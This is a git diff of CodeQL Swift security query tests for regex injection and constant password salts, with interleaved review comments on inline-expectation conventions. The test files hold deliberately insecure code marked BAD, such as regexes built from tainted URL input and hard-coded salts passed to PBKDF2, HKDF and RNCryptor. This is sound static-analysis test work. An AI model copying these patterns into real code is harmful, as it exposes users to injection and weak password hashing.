| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. 
| tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref index 6171cd820742..edd571a6692b 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref @@ -1 +1,2 @@ -queries/Security/CWE-730/RegexInjection.ql +query: queries/Security/CWE-730/RegexInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-730/tests.swift b/swift/ql/test/query-tests/Security/CWE-730/tests.swift index 234821d46aca..cd9b7adba464 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/tests.swift 
+++ b/swift/ql/test/query-tests/Security/CWE-730/tests.swift 
@@ -92,59 +92,59 @@ extension String { func regexInjectionTests(cond: Bool, varString: String, myUrl: URL) throws { let constString = ".*" - let taintedString = String(contentsOf: myUrl) // tainted + let taintedString = String(contentsOf: myUrl) // tainted // $ Source // --- Regex --- _ = try Regex(constString).firstMatch(in: varString) _ = try Regex(varString).firstMatch(in: varString) - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert _ = try Regex("(a|" + constString + ")").firstMatch(in: varString) - _ = try Regex("(a|" + taintedString + ")").firstMatch(in: varString) // BAD + _ = try Regex("(a|" + taintedString + ")").firstMatch(in: varString) // BAD // $ Alert _ = try Regex("(a|\(constString))").firstMatch(in: varString) - _ = try Regex("(a|\(taintedString))").firstMatch(in: varString) // BAD + _ = try Regex("(a|\(taintedString))").firstMatch(in: varString) // BAD // $ Alert _ = try Regex(cond ? constString : constString).firstMatch(in: varString) - _ = try Regex(cond ? taintedString : constString).firstMatch(in: varString) // BAD - _ = try Regex(cond ? constString : taintedString).firstMatch(in: varString) // BAD + _ = try Regex(cond ? taintedString : constString).firstMatch(in: varString) // BAD // $ Alert + _ = try Regex(cond ? constString : taintedString).firstMatch(in: varString) // BAD // $ Alert _ = try (cond ? Regex(constString) : Regex(constString)).firstMatch(in: varString) - _ = try (cond ? Regex(taintedString) : Regex(constString)).firstMatch(in: varString) // BAD - _ = try (cond ? Regex(constString) : Regex(taintedString)).firstMatch(in: varString) // BAD + _ = try (cond ? Regex(taintedString) : Regex(constString)).firstMatch(in: varString) // BAD // $ Alert + _ = try (cond ? 
Regex(constString) : Regex(taintedString)).firstMatch(in: varString) // BAD // $ Alert // --- RangeReplaceableCollection --- var inputVar = varString inputVar.replace(constString, with: "") - inputVar.replace(taintedString, with: "") // BAD + inputVar.replace(taintedString, with: "") // BAD // $ Alert inputVar.replace(constString, with: taintedString) // --- StringProtocol --- _ = inputVar.replacingOccurrences(of: constString, with: "", options: .regularExpression) - _ = inputVar.replacingOccurrences(of: taintedString, with: "", options: .regularExpression) // BAD + _ = inputVar.replacingOccurrences(of: taintedString, with: "", options: .regularExpression) // BAD // $ Alert // --- NSRegularExpression --- _ = try NSRegularExpression(pattern: constString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) - _ = try NSRegularExpression(pattern: taintedString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) // BAD + _ = try NSRegularExpression(pattern: taintedString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) // BAD // $ Alert // --- NSString --- let nsString = NSString(string: varString) _ = nsString.replacingOccurrences(of: constString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) - _ = nsString.replacingOccurrences(of: taintedString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) // BAD + _ = nsString.replacingOccurrences(of: taintedString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) // BAD // $ Alert // --- from the qhelp --- let remoteInput = taintedString let myRegex = ".*" - _ = try Regex(remoteInput) // BAD + _ = try Regex(remoteInput) // BAD // $ Alert let regexStr = "abc|\(remoteInput)" - _ = try NSRegularExpression(pattern: regexStr) // BAD + _ = try NSRegularExpression(pattern: regexStr) // BAD // $ Alert _ = try Regex(myRegex) 
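Review bot: The context line `inputVar.replace(constString, with: taintedString)` carries no comment. With inline expectations now checked for this file, an unannotated line asserts that no alert is wanted there, and a reader cannot tell whether that is deliberate. The intent appears to be that tainted data in the replacement argument is not a regex-injection sink, so a marker such as `// GOOD (tainted value is the replacement, not the pattern)` would make that negative case explicit. The body of `regexInjectionTests` continues past the end of this hunk.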
@@ -159,35 +159,35 @@ func regexInjectionTests(cond: Bool, varString: String, myUrl: URL) throws { let okSet: Set = ["abc", "def"] if (taintedString == okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } else { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (taintedString != okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (varString == okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (okInputs.contains(taintedString)) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if (okInputs.firstIndex(of: taintedString) != nil) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if let index = okInputs.firstIndex(of: taintedString) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if let index = okInputs.index(of: taintedString) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try 
Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if (okSet.contains(taintedString)) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } // --- multiple evaluations --- - let re = try Regex(taintedString) // BAD + let re = try Regex(taintedString) // BAD // $ Alert _ = try re.firstMatch(in: varString) // (we only want to flag one location total) _ = try re.firstMatch(in: varString) } diff --git a/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref b/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref index af89770b496a..a2ddbdf1d14b 100644 --- a/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref +++ b/swift/ql/test/query-tests/Security/CWE-757/InsecureTLS.qlref @@ -1 +1 @@ -queries/Security/CWE-757/InsecureTLS.ql +query: queries/Security/CWE-757/InsecureTLS.ql diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected index 002454a3021d..d9388214b4b8 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.expected 
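Review bot: The six lines whose comment reads `GOOD (effectively sanitized by the check) [FALSE POSITIVE]` are annotated with a plain `// $ Alert`, which records the alert as a wanted result, the same as the genuine `BAD` cases beside them. The inline-expectations convention for a known false positive is the `SPURIOUS:` prefix, e.g. `// GOOD (effectively sanitized by the check) // $ SPURIOUS: Alert`. That keeps the test passing today while flagging the expectation as one to remove once the query recognises the equality and allow-list checks as barriers. It also replaces the free-text `[FALSE POSITIVE]` tag with something the test framework understands. `regexInjectionTests` starts before this hunk.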
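Review bot: The new `InsecureTLS.qlref` gets only the `query:` line, while `RegexInjection.qlref` and `ConstantSalt.qlref` in this patch also gain `postprocess: utils/test/InlineExpectationsTestQuery.ql`. Without that line any `// $ Alert` comments in the CWE-757 test sources are not checked, so this test still relies on the `.expected` file alone. If the CWE-757 sources were left unannotated on purpose this is fine, but it is worth stating in the commit message. Otherwise add the `postprocess:` line and annotate the test file so the insecure-TLS cases get the same inline coverage.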
@@ -1,3 +1,22 @@ +#select +| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | +| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | +| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. 
| test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | +| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | +| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | edges | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:63:57:63:57 | myConstantSalt1 | provenance | | | rncryptor.swift:59:24:59:43 | call to Data.init(_:) | rncryptor.swift:68:106:68:106 | myConstantSalt1 | provenance | | 
@@ -53,22 +72,3 @@ nodes | test.swift:67:53:67:53 | constantSalt | semmle.label | constantSalt | | test.swift:68:53:68:53 | constantStringSalt | semmle.label | constantStringSalt | subpaths -#select -| rncryptor.swift:63:57:63:57 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:63:57:63:57 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:65:55:65:55 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:65:55:65:55 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:68:106:68:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:68:106:68:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:69:131:69:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:69:131:69:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:71:106:71:106 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:71:106:71:106 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:72:131:72:131 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:72:131:72:131 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. 
| rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:75:127:75:127 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:75:127:75:127 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:76:152:76:152 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:76:152:76:152 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| rncryptor.swift:78:135:78:135 | myConstantSalt1 | rncryptor.swift:59:29:59:29 | abcdef123456 | rncryptor.swift:78:135:78:135 | myConstantSalt1 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:59:29:59:29 | abcdef123456 | abcdef123456 | -| rncryptor.swift:79:160:79:160 | myConstantSalt2 | rncryptor.swift:60:29:60:29 | 0 | rncryptor.swift:79:160:79:160 | myConstantSalt2 | The value $@ is used as a constant, which is insecure for hashing passwords. | rncryptor.swift:60:29:60:29 | 0 | 0 | -| test.swift:51:49:51:49 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:51:49:51:49 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:52:49:52:49 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:52:49:52:49 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:56:59:56:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:56:59:56:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] 
| -| test.swift:57:59:57:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:57:59:57:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:62:59:62:59 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:62:59:62:59 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:63:59:63:59 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:63:59:63:59 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | -| test.swift:67:53:67:53 | constantSalt | test.swift:43:35:43:130 | [...] | test.swift:67:53:67:53 | constantSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:43:35:43:130 | [...] | [...] | -| test.swift:68:53:68:53 | constantStringSalt | test.swift:29:3:29:3 | this string is constant | test.swift:68:53:68:53 | constantStringSalt | The value $@ is used as a constant, which is insecure for hashing passwords. | test.swift:29:3:29:3 | this string is constant | this string is constant | diff --git a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref index 04aadc2161fc..dd7c483b0af2 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref +++ b/swift/ql/test/query-tests/Security/CWE-760/ConstantSalt.qlref @@ -1 +1,2 @@ -queries/Security/CWE-760/ConstantSalt.ql +query: queries/Security/CWE-760/ConstantSalt.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift b/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift index 51265b16c457..8d5af54c67fe 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift +++ b/swift/ql/test/query-tests/Security/CWE-760/rncryptor.swift 
@@ -56,27 +56,27 @@ func test(myPassword: String) { let myIV = Data(0) let myRandomSalt1 = Data(getARandomString()) let myRandomSalt2 = Data(getARandomString()) - let myConstantSalt1 = Data("abcdef123456") - let myConstantSalt2 = Data(0) + let myConstantSalt1 = Data("abcdef123456") // $ Source + let myConstantSalt2 = Data(0) // $ Source let _ = myEncryptor.key(forPassword: myPassword, salt: myRandomSalt1, settings: myKeyDerivationSettings) // GOOD - let _ = myEncryptor.key(forPassword: myPassword, salt: myConstantSalt1, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.key(forPassword: myPassword, salt: myConstantSalt1, settings: myKeyDerivationSettings) // BAD // $ Alert let _ = myEncryptor.keyForPassword(myPassword, salt: myRandomSalt2, settings: myKeyDerivationSettings) // GOOD - let _ = myEncryptor.keyForPassword(myPassword, salt: myConstantSalt2, settings: myKeyDerivationSettings) // BAD + let _ = myEncryptor.keyForPassword(myPassword, salt: myConstantSalt2, settings: myKeyDerivationSettings) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2, handler: myHandler) // BAD // $ Alert let _ = RNEncryptor(settings: kRNCryptorAES256Settings, 
password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // GOOD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // BAD - let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2, handler: myHandler) // BAD + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2, handler: myHandler) // BAD // $ Alert + let _ = RNEncryptor(settings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2, handler: myHandler) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myRandomSalt2) // GOOD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myConstantSalt1, hmacSalt: myRandomSalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, with: kRNCryptorAES256Settings, password: myPassword, iv: myIV, encryptionSalt: myRandomSalt1, hmacSalt: myConstantSalt2) // BAD // $ Alert let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myRandomSalt2) // GOOD - let _ = try? 
myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2) // BAD - let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2) // BAD + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myConstantSalt1, HMACSalt: myRandomSalt2) // BAD // $ Alert + let _ = try? myEncryptor.encryptData(myData, withSettings: kRNCryptorAES256Settings, password: myPassword, IV: myIV, encryptionSalt: myRandomSalt1, HMACSalt: myConstantSalt2) // BAD // $ Alert // appending constants let _ = myEncryptor.key(forPassword: myPassword, salt: Data(getARandomString() + getARandomString()), settings: myKeyDerivationSettings) // GOOD diff --git a/swift/ql/test/query-tests/Security/CWE-760/test.swift b/swift/ql/test/query-tests/Security/CWE-760/test.swift index 434e2daf6dad..b967c76b0c64 100644 --- a/swift/ql/test/query-tests/Security/CWE-760/test.swift +++ b/swift/ql/test/query-tests/Security/CWE-760/test.swift @@ -26,7 +26,7 @@ final class Scrypt { // Helper functions func getConstantString() -> String { - "this string is constant" + "this string is constant" // $ Source } func getConstantArray() -> Array { @@ -40,7 +40,7 @@ func getRandomArray() -> Array { // --- tests --- func test() { - let constantSalt: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] + let constantSalt: Array = [0x2a, 0x3a, 0x80, 0x05, 0xaf, 0x46, 0x58, 0x2d, 0x66, 0x52, 0x10, 0xae, 0x86, 0xd3, 0x8e, 0x8f] // $ Source let constantStringSalt = getConstantArray() let randomSalt = getRandomArray() let randomArray = getRandomArray() 
@@ -48,23 +48,23 @@ func test() { let iterations = 120120 // HKDF test cases - let hkdfb1 = HKDF(password: randomArray, salt: constantSalt, info: randomArray, keyLength: 0, variant: variant) // BAD - let hkdfb2 = HKDF(password: randomArray, salt: constantStringSalt, info: randomArray, keyLength: 0, variant: variant) // BAD + let hkdfb1 = HKDF(password: randomArray, salt: constantSalt, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert + let hkdfb2 = HKDF(password: randomArray, salt: constantStringSalt, info: randomArray, keyLength: 0, variant: variant) // BAD // $ Alert let hkdfg1 = HKDF(password: randomArray, salt: randomSalt, info: randomArray, keyLength: 0, variant: variant) // GOOD // PBKDF1 test cases - let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD - let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD + let pbkdf1b1 = PKCS5.PBKDF1(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf1b2 = PKCS5.PBKDF1(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf1g1 = PKCS5.PBKDF1(password: randomArray, salt: randomSalt, iterations: iterations, keyLength: 0) // GOOD // PBKDF2 test cases - let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD - let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD + let pbkdf2b1 = PKCS5.PBKDF2(password: randomArray, salt: constantSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert + let pbkdf2b2 = PKCS5.PBKDF2(password: randomArray, salt: constantStringSalt, iterations: iterations, keyLength: 0) // BAD // $ Alert let pbkdf2g1 = PKCS5.PBKDF2(password: randomArray, salt: randomSalt, iterations: iterations, keyLength: 0) // GOOD // 
